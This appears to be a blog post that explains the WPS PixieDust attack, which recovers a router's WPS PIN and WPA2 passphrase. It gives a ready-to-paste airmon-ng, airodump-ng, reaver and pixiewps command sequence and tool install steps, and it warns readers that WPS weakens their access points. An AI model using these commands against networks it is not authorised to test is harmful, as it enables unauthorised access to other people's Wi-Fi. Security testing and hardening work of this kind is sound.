In this post we are looking at how vulnerable WPS makes your Access Point. WiFi Protected Setup makes it nice and easy for you to connect to your wireless devices by using a simple pin number, instead of your hard to guess passphrase. The issue is that this means your secure 32 character passphrase is about as much use a chocolate fireguard, as instead of taking potentially years to crack, you can attack the pin number which only has 11,000 iterations and this can be cracked in hours (even with timeouts and other controls in place).
In this video we will show how a vulnerability in some of the chipsets of Wireless Access Points allows you to crack the WPS code in less than a second as well as revealing the WPA pin number. This attack is called the PixieDust attack, and it currently works on certain firmware on Broadcom, Realtek, Ralink and MediaTek chipsets. In the video this is demonstrated on an older BT HomeHub 3 which is using a Realtek chipset.
The way this works is that the Enrollee Hashes (E-Hash1 / E-Hash2) are supposed to be secret hashes, but when they are disclosed we can use them along with the Enrolle and Registrar Public Keys, along with the E & R Nonces and the Auth Key to decipher the WPS PIN Key.
Just to provide some comparison, using the WPS PixieDust attack we got the PIN and then the WPA2 Passphrase in less than a second. Stealing the WPA2 Hash and attacking this directly with a single GPU the time estimated to crack based on knowing its Alpha Numeric with no special characters is 853,399 days, 2 hours and 44 minutes, so year WPS add some weakness to your hardened access point 🙂
Below is the code used during the above video, you can use this easily copy and paste with your own information.
iwconfig
airmon-ng start wlan1
airmon-ng check kill
airodump-ng wlan1mon –wps
reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <auth key> -n <e-nonce>
reaver -i wlan1mon -c <channel number> -b <ap mac address> -vv -K 1
If you are looking to do this on Ubuntu and not Kali, you will need the following packages (cheers Matt):
apt-get install install build-essential libnl-3-dev libnl-genl-3-dev
wget http://download.aircrack-ng.org/aircrack-ng.1.2-rc2.tar.gz
git clone https://github.com/t6x/reaver-wps-fork-t6x
git clone https://github.com/wiire/pixiewps
Finally, in the WPS column you need to be checking for one of the following to make sure the Access Point has WPS enabled, if it isnt its not supported on the device, or you have successfully disabled it. 1.0, LAB, PBC, NFC, PIN,